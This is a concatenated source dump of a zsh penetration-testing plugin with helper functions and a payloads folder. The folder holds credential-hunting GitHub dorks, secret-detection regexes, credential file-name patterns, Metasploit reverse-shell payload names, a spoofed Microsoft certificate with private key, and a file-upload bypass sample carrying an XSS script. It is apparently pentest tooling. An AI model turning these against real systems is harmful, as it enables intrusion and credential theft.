__check-network() { [[ -z "${__NETWORK}" ]] && qq-vars-set-network }
########## __RHOST
export __RHOST=""
qq-vars-set-rhost() { __prefill __RHOST RHOST ${__RHOST} }
########## __RPORT
export __RPORT=""
qq-vars-set-rport() { __prefill __RPORT RPORT ${__RPORT} }
########## __LHOST
export __LHOST=""
qq-vars-set-lhost() {
if [[ -z $__LHOST ]]
then
__ask "Choose a local IP address: "
__LHOST=$(__menu $(ip addr list | grep -e "inet " | cut -d' ' -f6 | cut -d'/' -f1))
else
__prefill __LHOST LHOST ${__LHOST}
fi
}
########## __LPORT
export __LPORT=""
qq-vars-set-lport() { __prefill __LPORT LPORT ${__LPORT} }
########## __URL
export __URL=""
qq-vars-set-url() {
local u && __prefill u URL ${__URL}
__URL=$(echo ${u} | sed 's/\/$//')
}
########## __UA
export __UA="Mozilla/5.0"
qq-vars-set-ua() {
IFS=$'\n'
__ask "Choose a user agent: "
__UA=$(__menu $(cat ${__MNU_UA}))
}
__check-ua() { [[ -z "${__UA}" ]] && qq-vars-set-ua }
########## __WORDLIST
export __WORDLIST=""
qq-vars-set-wordlist() {
if [[ -z $__WORDLIST ]]
then
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(cat ${__MNU_WORDLISTS}))
else
__WORDLIST= __prefill __WORDLIST WORDLIST ${__WORDLIST}
fi
}
qq-vars-set-wordlist-web() {
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/Web-Content | sort))
}
qq-vars-set-wordlist-dns() {
__ask "Choose a wordlist: "
__WORDLIST=$(__menu $(find /usr/share/seclists/Discovery/DNS | sort))
}
########## __PASSLIST
export __PASSLIST="/usr/share/wordlists/rockyou.txt"
qq-vars-set-passlist() {
__ask "Choose a passlist: "
__PASSLIST=$(__menu $(find /usr/share/seclists/Passwords | sort))
}
# helpers
export __THREADS
__check-threads() { __askvar __THREADS THREADS }
export __USER
__check-user() { __askvar __USER USER }
export __SHARE
__check-share() { __askvar __SHARE SHARE }
export __ORG
__check-org() { __askvar __ORG ORG }
export __ASN
__check-asn() { __askvar __ASN ASN }
__netpath() {
__check-project
local net=$(echo ${__NETWORK} | cut -d'/' -f1)
local result=${__PROJECT}/networks/${net}
mkdir -p "${result}"
echo "${result}"
}
__hostpath() {
__check-project
local result=${__PROJECT}/hosts/${__RHOST}
mkdir -p "${result}"
echo "${result}"
}
__urlpath() {
__check-project
local host=$(echo ${__URL} | cut -d'/' -f3)
local result=${__PROJECT}/hosts/${host}
mkdir -p "${result}"
echo "${result}"
}
__dompath() {
__check-project
local result=${__PROJECT}/domains/${__DOMAIN}
mkdir -p "${result}"
echo "${result}"
}
================================================
FILE: modules/qq.zsh
================================================
#!/usr/bin/env zsh
#############################################################
# qq
#############################################################
qq-help() {
cat << "DOC"
qq
--
The qq namespace is the root of all other namespaces that can be access with tab-completion.
To get started, explore the qq-<namespace>-help commands. Install dependencies per namespace,
using the qq-<namespace>-install commands or install all dependencies using qq-install-all.
Variables
---------
__VERSION Current version of the Quiver plugin
__PLUGIN Full path to the Quiver oh-my-zsh plugin directory
Commands
--------
qq-update: git pull the latest (MASTER branch) version of Quiver
qq-status: check the current status of the locally cloned Quiver repository
qq-whatsnew: display the latest release notes
qq-debug: display the local diagnostic log
Namespaces
----------
Quiver is organized in a tree of namespaces that are accessible via "qq-" with tab completion and search.
Each namespace has its own install and help commands.
Install and Configuration
-------------------------
qq-install- Installers for commonly used applications and global installer for all dependencies
qq-notes- Configure and read your markdown notes
qq-vars-global- Persistent environment variables used in all commands, all sessions
Utility
---------
qq-encoding- Used for encoding / decoding data
qq-kali- Variety of commands for managing Kali linux
Engagement / Project / Bounty
-----------------------------
qq-log- Configure and setup a logbook for current engagement
qq-vars- Per-session, per-engagement variables used in all commands
qq-project- Commands to define scope and manage project data
qq-project-custom- Commands for custom project directory scaffolding
Recon Phase
-----------
qq-recon-org- Recon commands for organization files and data
qq-recon-github- Recon commands for searching github repositories
qq-recon-networks- Recon commands for identiying an organization's networks
qq-recon-domains- Recon commands for horizontal domain enumeration
qq-recon-subs- Recon commands for vertical sub-domain enumeration
Active Enumeration Phase
------------------------
qq-enum-network- Enumerate and scan networks
qq-enum-host- Enumerate and scan an individual host
qq-enum-dhcp- Enumerate DHCP services
qq-enum-dns- Enumerate DNS services
qq-enum-ftp- Enumerate FTP services
qq-enum-kerb- Enumerate Kerberos services
qq-enum-ldap- Enumerate LDAP and Active Directory services
qq-enum-mssql- Enumerate MSSQL database services
qq-enum-mysql- Enumerate MYSQL database services
qq-enum-nfs- Enumerate NFS shares and services
qq-enum-oracle- Enumerate Oracle database services
qq-enum-pop3- Enumerate POP3 services
qq-enum-rdp- Enumerate RDP services
qq-enum-smb- Enumerate SMB services
qq-enum-web- Enumerate web servers and services
qq-enum-web-aws- Enumerate AWS hosted services
qq-enum-web-dirs- Enumerate directories and files
qq-enum-web-elastic- Enumerate elastic search services
qq-enum-web-fuzz- Fuzz inputs such as forms, cookies and headers
qq-enum-web-js- Mine javascript files for secrets
qq-enum-web-php- Enumerate php web servers
qq-enum-web-ssl- Enumerate SSL certs and services
qq-enum-web-vuln- Check for common web vulnerabilities
qq-enum-web-xss- XSS helpers
Exploitation Phase
------------------
qq-srv- Commands for spawning file hosting services
qq-exploit- Commands for compiling exploits
qq-shell-tty- Commands for upgrading shells to tty
qq-shell-handlers- Commands for spawning reverse shell handlers
qq-shell-handlers-msf- Commands for spawning reverse shells with Metasploit
Post-Exploitation Phase
-----------------------
qq-pivot- Commands for pivoting with ssh
DOC
}
qq-update() {
cd $HOME/.oh-my-zsh/custom/plugins/quiver
git pull
rm $__REMOTE_VER
rm $__REMOTE_CHK
cd - > /dev/null
source $HOME/.zshrc
}
qq-status() {
cd $HOME/.oh-my-zsh/custom/plugins/quiver
git status | grep On | cut -d" " -f2,3
cd - > /dev/null
}
qq-whatsnew() {
cat $__PLUGIN/RELEASES.md
}
qq-debug() {
cat ${__LOGFILE}
}
##### Output Helpers
__cyan() echo "$fg[cyan]$@ $reset_color"
__green() echo "$fg[green]$@ $reset_color"
__blue() echo "$fg[blue]$@ $reset_color"
__yellow() echo "$fg[yellow]$@ $reset_color"
__err() echo "$fg[red]$@ $reset_color"
__info() __blue "[*] $@"
__ok() __green "[+] $@"
__warn() __yellow "[!] $@"
__err() __red "[X] $@"
##### Input Helpers
__ask() __yellow "$@"
__prompt() __cyan "[?] $@"
__askvar() {
local retval=$1
local question=$2
local tmpval
read "tmpval?$fg[cyan]${question}:$reset_color "
eval $retval="'$tmpval'"
}
__askpath() {
local retval=$1
local question=$2
local prefill=$3
local tmpinput=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -c -o cat)
local tmpval=$(echo "${tmpinput}" | sed 's/\/$//' )
eval $retval="'$tmpval'"
}
__prefill() {
local retval=$1
local question=$2
local prefill=$3
local tmpval=$(rlwrap -S "$fg[cyan]${question}: $reset_color" -P "${prefill}" -e '' -o cat)
eval $retval="'$tmpval'"
}
__check-proceed() {
PS3="$fg[cyan]Select: $reset_color"
COLUMNS=10
select yn in "Yes" "Cancel"; do
case $yn in
Yes)
return 0
break;;
*)
return 1
break;;
esac
done
}
__menu() {
PS3="$fg[cyan]Select: $reset_color"
COLUMNS=10
select o in $@; do break; done
echo ${o}
}
##### String Helpers
__trim-slash() { echo $1 | sed 's/\/$//' }
__trim-quotes() { echo $1 | tr -d \" }
__trim-newline() { echo $1 | tr -d "\n"}
__rand() {
if [ "$#" -eq "1" ]
then
head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo ''
else
head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo ''
fi
}
##### Tool Helpers
__msf() {
local msfcmd=$(cat $@)
print -z "msfconsole -n -q -x \"${msfcmd}\" "
}
================================================
FILE: payloads/aka.ms.pem
================================================
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl
Q1cz2xwkyCb+xyGpEC51O4Hxb9bXEyV9JtJFjAlbehEkj+jFRIqEAXEd1UliFuRa
gx4rwv0SpQWr3zu/jS5m+JdKnxdNISMFUR2G9bf8wcnNqhbtr6ByFyjsPQIDAQAB
AoGBAIXWGkKeoEzojelf2sPe9kC6MnZo+Dfkj154BbcQVct0qunQHkvRdQ7z9zr+
ONO8MfzgnRWlOT3sVIJhW4Qj/hjNkIVpoGzRIpcGoW3L0XunJ1q6VaS+ESQUx0pY
juyNmRYRaxSYrRzPolDqhX11fNM1Cswm5rrb2msvBBf7q/yNAkEA2Ub6za/tScaQ
+xiLnmGwHSH9w0mKIm/XAuDFm1kOuId9xKOiwK5/7gLuan+rxSxc0FhoMYsB7nsN
zgzJywasMwJBANaG/eXdNZYdfAGCkcpCmgUxiYx6/gRy3VX+uhMvaqBihBoGChiJ
NVUs6ybyIJbh52fphPvfv2f6aIW5myFOlc8CQDTdymSFq8zJnbkazc3povpTrPT5
Tbz3TW+L1UjpMGXBwd44mn8bdlEpMW2ERv0gwCyJdkCnu/6UvlUmU2ss4nUCQAnn
vb1pU1oVDm67aqPeI2JuAR3dZ/EopJOd6VWNcOzq35KcCMdNPosqQclQkLSmxZqE
q8E9eYcBhuX1xfXpvP0CQBYNy279VufEzjkyjtv7Gc+6LjNoEcYOXQjffMN0gpwN
+uc9FlSagHHs9hKLQk/4vIEeTqz008pwtF0XLy1dtdU=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIICyDCCAjGgAwIBAgIUAcIAbh51mEfqQLiFtggAAABuHn8wDQYJKoZIhvcNAQEL
BQAwgYcxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJXQTEQMA4GA1UEBxMHUmVkbW9u
ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQLExVNaWNy
b3NvZnQgQ29ycG9yYXRpb24xGTAXBgNVBAMTEGdvLm1pY3Jvc29mdC5jb20wHhcN
MTkwOTA2MTkzNzIxWhcNMjEwOTA2MTkzNzIxWjCBhzELMAkGA1UEBhMCVVMxCzAJ
BgNVBAgTAldBMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQg
Q29ycG9yYXRpb24xHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEZMBcG
A1UEAxMQZ28ubWljcm9zb2Z0LmNvbTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC
gYEAthPoTXbV1FqXAeKic/mn0JmTVAe1eoBVYhHo5lPUl7joqwFS5UNXM9scJMgm
/schqRAudTuB8W/W1xMlfSbSRYwJW3oRJI/oxUSKhAFxHdVJYhbkWoMeK8L9EqUF
q987v40uZviXSp8XTSEjBVEdhvW3/MHJzaoW7a+gchco7D0CAwEAAaMvMC0wDAYD
VR0TAQH/BAIwADAdBgNVHQ4EFgQUg2JaOA9UjImKCHybc5Bqu8YS40cwDQYJKoZI
hvcNAQELBQADgYEAHkTVXl44F+tN0WWn3rbIUosimlbSYd6S9yLfCPGhpBdCv8GF
3jfFULoiFv/L79KuNfZ/RElR+xtqnukrg3C9NYCC3mRymZRMnjnoFjDG//AoeLsU
4802Opg2opg+OG23YFvz01rmdiHtUFM/0S1V4p3oiCDkwdz24E6/60OQu0A=
-----END CERTIFICATE-----
================================================
FILE: payloads/aliases.rc
================================================
#nav
alias cd..="cd ../"
alias cls="clear"
alias path="echo -e \${PATH//:/\\n}"
alias cp="cp -iv"
alias mv="mv -iv"
alias lf="ls -l | egrep -v '^d'"
alias ldir='ls -d */'
#sys
alias mounted="sudo mount | column -t"
alias df="df -mTh --total"
alias free="free -th"
alias ps="ps auxf"
alias psg="ps aux | grep -v grep | grep -i -e VSZ -e "
#network
alias pcap="sudo tcpdump -r"
alias myip="curl icanhazip.com"
alias grip="grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'"
#proton vpn
alias pv-check="sudo pip3 install protonvpn-cli --upgrade"
alias pvt="sudo protonvpn c -f"
alias pvu="sudo protonvpn c -f -p udp"
alias pvd="sudo protonvpn disconnect"
alias pvs="sudo protonvpn status"
#zsh
alias zprc="cat ~/.zshrc"
alias zerc="nano ~/.zshrc"
alias zsrc="source ~/.zshrc"
# files and directory
alias linestocsv="paste -s -d, -"
alias csvtolines="tr ',' '\n'"
alias sfu="sort -u "
alias sfip="sort -u | sort -V "
alias sfuc="sort | uniq -c | sort -n"
alias dos2unix="tr -d '\015' "
alias unix2dos="sed -e 's/$/\r/'"
# out
alias trim1="sed 's/.$//'"
alias trim2="sed 's/..$//'"
alias trim3="sed 's/...$//'"
alias trim4="sed 's/....$//'"
# tools
alias hp="httprobe -t 3000 -c 50 "
================================================
FILE: payloads/github-dorks-commits.txt
================================================
"Slack Token": "(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"RSA private key": "-----BEGIN RSA PRIVATE KEY-----",
"SSH (OPENSSH) private key": "-----BEGIN OPENSSH PRIVATE KEY-----",
"SSH (DSA) private key": "-----BEGIN DSA PRIVATE KEY-----",
"SSH (EC) private key": "-----BEGIN EC PRIVATE KEY-----",
"PGP private key block": "-----BEGIN PGP PRIVATE KEY BLOCK-----",
"Facebook Oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
"Twitter Oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
"GitHub": "[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\"\\s][0-9a-zA-Z]{35,40}['\"\\s]",
"Google Oauth": "(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")",
"AWS API Key": "AKIA[0-9A-Z]{16}",
"Heroku API Key": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"Generic Secret": "[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
"Generic API Key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\"\\s][0-9a-zA-Z]{32,45}['\"\\s]",
"Slack Webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"Google (GCP) Service-account": "\"type\": \"service_account\"",
"Twilio API Key": "SK[a-z0-9]{32}",
"Password in URL": "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
“Internal subdomain”: re.compile(‘([a-z0-9]+[.]*supersecretinternal[.]com)’),
“Slack Token”: re.compile(‘(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})’),
“RSA private key”: re.compile(‘—–BEGIN RSA PRIVATE KEY—–‘),
“Facebook Oauth”: re.compile(‘[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\’|”][0-9a-f]{32}[\’|”]’),
“Twitter Oauth”: re.compile(‘[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\’|”][0-9a-zA-Z]{35,44}[\’|”]’),
“Google Oauth”: re.compile(‘(“client_secret”:”[a-zA-Z0-9-_]{24}”)’),
“AWS API Key”: re.compile(‘AKIA[0-9A-Z]{16}’),#[a|A][w|W][s|S].*AKIA[0-9A-Z]{16}’),
“Heroku API Key”: re.compile(‘[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}’),
“Generic Secret”: re.compile(‘[s|S][e|E][c|C][r|R][e|E][t|T].*[\’|”][0-9a-zA-Z]{32,45}[\’|”]’)
================================================
FILE: payloads/msf-windows-payloads.txt
================================================
windows/x64/meterpreter/reverse_http
windows/x64/meterpreter/reverse_https
windows/x64/meterpreter/reverse_named_pipe
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_winhttp
windows/x64/meterpreter/reverse_winhttps
windows/x64/shell/reverse_tcp
windows/x64/shell/reverse_tcp_rc4
windows/x64/shell/reverse_tcp_uuid
windows/x64/shell_bind_tcp
windows/x64/shell_reverse_tcp
================================================
FILE: payloads/recon-dorks-github.txt
================================================
filename:constants
filename:settings
filename:database
filename:config
filename:environment
filename:spec
filename:zhrc
filename:bash
filename:npmrc
filename:dockercfg
filename:pass
filename:global
filename:credentials
filename:connections
filename:s3cfg
filename:wp-config
filename:htpasswd
filename:git-credentials
filename:id_dsa
filename:id_rsa
extension:env
extension:cfg
extension:ini
language:yaml -filename:travis
extension:properties
extension:bat
extension:sh
extension:zsh
extension:pem
extension:ppk
extension:sql
filename:bash_history
filename:bash_profile
filename:bashrc
filename:cshrc
filename:history
filename:netrc
filename:pgpass
filename:tugboat
filename:dhcpd.conf
filename:express.conf
filename:filezilla.xml
filename:idea14.key
filename:makefile
filename:gitconfig
filename:prod.exs
filename:prod.secret.exs
filename:proftpdpasswd
filename:recentservers.xml
filename:robomongo.json
filename:server.cfg
filename:shadow
filename:sshd_config
filename:known_hosts
filename:dockercfg
filename:github_token
staging
stg
prod
preprod
swagger
internal
dotfiles
dot-files
mydotfiles
config
dbpasswd
db_password
db_username
dbuser
testuser
dbpassword
keyPassword
storePassword
passwords
password
secret.password
database_password
sql_password
passwd
pass
pwd
pwds
root_password
credentials
security_credentials
connectionstring
private -language:java
private_key
master_key
token
access_token
auth_token
oauth_token
authorizationToken
secret
secrets
secret_key
secret_token
api_secret
app_secret
appsecret
client_secret
key
send_keys
send.keys
sendkeys
apikey
api_key
app_key
application_key
appkey
appkeysecret
access_key
apiSecret
x-api-key
apidocs
secret_access_key
encryption_key
consumer_key
auth
secure
login
conn.login
sshpass
ssh2_auth_password
irc_pass
fb_secret
sf_username
node_env
aws_key
aws_token
aws_secret
aws_access
AWSSecretKey
github_key
github_token
gh_token
slack_api
slack_token
bucket_password
redis_password
ldap_username
ldap_password
gmail_username
gmail_password
codecov_token
fabricApiSecret
mailgun
mailchimp
appspot
firebase
gitlab
stripe
herokuapp
cloudfront
amazonaws
removed
"removed password"
hardcoded
oops
"fixed security"
"removed prod"
"removed creds"
"removed secret"
filename:passwords.txt
filename:users.txt
================================================
FILE: payloads/recon-dorks-google.txt
================================================
================================================
FILE: payloads/resolvers.txt
================================================
1.1.1.1
1.0.0.1
8.8.8.8
8.8.4.4
208.67.222.222
208.67.220.220
64.6.64.6
64.6.65.6
84.200.69.80
84.200.70.40
205.171.3.66
205.171.202.166
205.171.3.26
205.171.2.26
216.146.35.35
216.146.36.36
45.33.97.5
37.235.1.177
37.235.1.174
172.104.237.57
77.88.8.8
77.88.8.1
91.239.100.100
89.233.43.71
74.82.42.42
156.154.70.5
156.154.71.5
45.77.165.194
68.238.120.12
68.238.0.12
207.148.83.241
142.4.204.111
142.4.205.47
149.56.184.112
51.79.68.177
66.70.228.164
172.98.193.42
66.70.228.164
128.31.0.72
155.138.240.237
================================================
FILE: payloads/secrets-content.json
================================================
{
"flags": "-HnriE",
"patterns": [
"[a-z0-9.-]+\\.s3\\.amazonaws\\.com",
"[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com",
"[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)",
"//s3\\.amazonaws\\.com/[a-z0-9._-]+",
"//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+",
"([^A-Z0-9]|^)(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{12,}",
"([^A-Za-z0-9+/]|^)(eyJ|YTo|Tzo|PD[89]|aHR0cHM6L|aHR0cDo|rO0)[%a-zA-Z0-9+/]+={0,2}",
"([^A-Z0-9]|)AKIA[A-Z0-9]{12}([^A-Z0-9]|)",
"[\\s][a-zA-Z0-9]{40}[\\s]",
"aws_secret_access_key.*?[a-zA-Z0-9/\\\\+]{40}",
"amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
"EAACEdEose0cBA[0-9A-Za-z]+",
"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]",
"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
"[s|S][e|E][c|C][r|R][e|E][t|T].*['|\\\"][0-9a-zA-Z]{32,45}['|\\\"]",
"[\\s*](token:\\s*)[\\S]{20}",
"gitlab.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"private.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"access.token[^a-z0-9_]*?[a-z0-9_]{20}([^a-z0-9_]|$)",
"[g|G][i|I][t|T][h|H][u|U][b|B].*['|\\\"][0-9a-zA-Z]{35,40}['|\\\"]",
"\"type\": \"service_account\"",
"[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com",
"ya29\\.[0-9A-Za-z\\-_]+",
"AIza[0-9A-Za-z\\\\-_]{35}",
"[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"[0-9a-f]{32}-us[0-9]{1,2}",
"key-[0-9a-zA-Z]{32}",
"[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]",
"access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}",
"sk_live_[0-9a-z]{32}",
"(-*)BEGIN [\\\\s\\\\S]{2,} PRIVATE KEY(-*)",
"SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}",
"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})",
"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"sq0atp-[0-9A-Za-z\\\\-_]{22}",
"sq0csp-[0-9A-Za-z\\\\-_]{43}",
"sk_live_[0-9a-zA-Z]{24}",
"rk_live_[0-9a-zA-Z]{24}",
"SK[0-9a-fA-F]{32}",
"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}",
"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*['|\"][0-9a-zA-Z]{35,44}['|\"]",
"deleted",
"security",
"removed",
"test-data",
"prod",
"production"
]
}
================================================
FILE: payloads/secrets-files.json
================================================
{
"flags": "-HnriE",
"patterns": [
"database",
"settings",
"database",
"config",
"environment",
"spec",
"zshrc",
"bash",
"npmrc",
"dockercfg",
"pass",
"global",
"credentials",
"connections",
"s3cfg",
"wp-config",
"htpasswd",
"git-credentials",
"id_dsa",
"id_rsa",
"creds",
".*\\.env$",
"\\.agilekeychain$",
"\\.?aws/credentials$",
"^\\.?htpasswd$",
"\\.keychain$",
"\\.cscfg$",
"carrierwave.rb",
"knife.rb",
"\\.?chef/(.*)\\.pem$",
"^(\\.|_)?netrc$",
"credential",
"password",
"^\\.?dbeaver-data-sources.xml$",
"\\.dayone$",
"doctl/config.yaml$",
"settings.py",
"^\\.?dockercfg$",
"^\\.?env$",
"filezilla.xml",
"recentservers.xml",
"^key(store|ring)$",
"^\\.?gitconfig$",
"config/hub$",
"\\.gnucash$",
"credentials.db",
"credentials.json",
"^.*-[a-f0-9]{12}\\.json$",
"\\.?xchat2?/servlist_?\\.conf$",
"\\.?irssi/config$",
"\\.jks$",
"jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml",
"\\.kwallet$",
"^kdbx?$",
".boto",
"adc.json",
"configuration.user.xpl",
"\\.tpm$",
"\\.bek$",
"\\.mdf$",
"\\.sdf$",
"^\\.?muttrc$",
"^\\.?mysql_history$",
"^\\.?npmrc$",
"\\.pcap$",
"omniauth.rb",
"\\.ovpn$",
"config(\\.inc)?\\.php$",
"\\.psafe3$",
"otr.private_key",
"\\.?purple/accounts\\.xml$",
"^\\.?psql_history$",
"^\\.?pgpass$",
"credentials.xml",
"etc/passwd$",
"etc/shadow$",
"LocalSettings.php",
"database.yml",
"\\.pkcs12$",
"\\.p12$",
"\\.pfx$",
"\\.asc$",
"^key(pair)?$",
"\\.pem$",
"journal.txt",
"^.*_rsa$",
"^.*_dsa$",
"^.*_ed25519$",
"^.*_ecdsa$",
"\\.?recon-ng/keys\\.db$",
"\\.rdp$",
"robomongo.json",
"^\\.?irb_history$",
"secret_token.rb",
"\\.?gem/credentials$",
"^\\.?s3cfg$",
"^sftp-config(\\.json)?$",
"^sql(dump)?$",
"\\.sqlite$",
"\\.?ssh/config$",
"Favorites.plist",
"`^\\.?(bash_|zsh_)?aliases$",
"^\\.?(bash_|zsh_|sh_|z)?history$",
"^\\.?(bash|zsh|csh)rc$",
".exports",
".functions",
".extra",
"^\\.?(bash_|zsh_)?profile$",
"^\\.?trc$",
"terraform.tfvars",
"^\\.?tugboat$",
"\\.tblk$",
"ventrilo_srv.ini",
"^\\.?gitrobrc$",
"\\.fve$",
"proftpdpasswd",
"^\\.?git-credentials$",
"robomongo.json",
"idea14.key",
"express.conf",
"prod.exs",
"prod.secret.exs",
"logins.json",
".remote-sync.json",
".ftpconfig"
]
}
================================================
FILE: payloads/tcp-ports.txt
================================================
21,22,25,80,88,161,443,445,744,1433,1521,2075,2076,3000,3306,3366,3389,3868,4000,4040,4044,4443,5000,5432,5900,6000,6443,7077,8000,8080,8081,8089,8181,8443,8888,9000,9091,9443,9999,27017,10000,15672
================================================
FILE: payloads/user-agents.txt
================================================
Googlebot/2.1 (+http://www.google.com/bot.html)
Mozilla/5.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148
================================================
FILE: payloads/web-file-upload-bypass-bytes.txt
================================================
JPEG - FF D8 FF DB - ÿØÿÛ
GIF - 47 49 46 38 - GIF8
PNG - 89 50 4E 47 - ‰PNG
================================================
FILE: payloads/web-file-upload-bypass.txt
================================================
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png
GIF8
<html><script>alert('XSS');</script></html>
================================================
FILE: payloads/wordlist-api.txt
================================================
0
1
2
3
accelerate
accept
account
accounts
acquire
activate
active
adapt
add
address-check
adjust
admin
alert
amount
annotate
anticipate
api
api_auth
apis
apply
archive
arrange
asset
assets
auth
auth_user
balance
balances
bar
baz
bio
bios
build
calculate
cfg
change
channel
chart
check
child
children
claim
class
client
clients
close
collect
comm
comment
comments
common
communicate
company
compare
complete
compose
compute
conf
config
connections
consolidate
construct
contact
contract
coordinate
count
create
credentials
creds
crush
csv
current
custom
customer
customers
damage
dashboard
data
debug
def
default
define
del
delete
deliver
delta
demo
demonstrate
dequeue
derive
design
destroy
details
detect
dev
develop
developers
deviceCatalog
devices
deviceTypes
devise
dir
directory
disable
display
divide
do
dob
docs
documentation
doFor
domain
download
edit
email
employee
enable
err
errors
event
events
explode
export
fabricate
fashion
feed
file
files
filter
foo
forge
form
format
generate
get
github
gmail
go
group
health
help
hidden
history
home
id
image
import
improve
include
info
inform
input
inquiry
insert
install
instances
interpret
item
job
join
json
key
kill
lang
last
level
link
links
list
load
location
lock
log
log_event
login
logins
logout
logs
loop
main
make
manufacturers
map
max
member
members
merchant
merge
metadata
method
methods
metrics
min
mod
money
monitoring
move
multiply
my
name
names
new
next
notifications
notify
oauth
object
objects
open
option
options
order
orders
originate
out
pack
page
pages
panel
parent
parse
pass
password
passwords
permissions
phone
picture
pin
plugin
post
posts
preferences
preserve
preview
print
private
prod
produce
production
profile
profiles
promote
public
put
q
query
queue
queue-jobs
quit
raw
reactivate
read
recite
record
ref
reg
register
release
remove
resend-verification
restore
restrict
retrieve
robots.txt
rss
run
s
sale
sales
save
search
select
send
server
set
setting
settings
setup
show
site
sleep
sort
split
start
state
status
stop
study
sub
summaries
swagger
swagger.json
swagger-resources
swagger-ui.html
table
tags
temp
template
terminate
test
tests
theme
ticket
tmp
token
twitter
type
understand
undo
union
unit
unqueue
update
upgrade
upload
upset
url
use
user
userAccountAssignments
userAssets
userdetails
username
userPreferences
users
v0
v1
v2
v3
validate
vendor
vendors
verify
version
wait
website
work
xml
xmlrpc
yahoo
zip
================================================
FILE: payloads/wordlists.txt
================================================
/usr/share/seclists/Discovery/Web-Content/quickhits.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-words.txt
/usr/share/seclists/Discovery/Web-Content/raft-large-files.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists/Discovery/DNS/dns-Jhaddix.txt
/usr/share/seclists/Discovery/Web-Content/swagger.txt
/usr/share/seclists/Discovery/Web-Content/graphql.txt
================================================
FILE: quiver.code-workspace
================================================
{
"folders": [
{
"path": "."
}
]
}
================================================
FILE: quiver.plugin.zsh
================================================
#!/usr/bin/env zsh
autoload colors; colors
#############################################################
# quiver
# Author: Steve Mcilwain
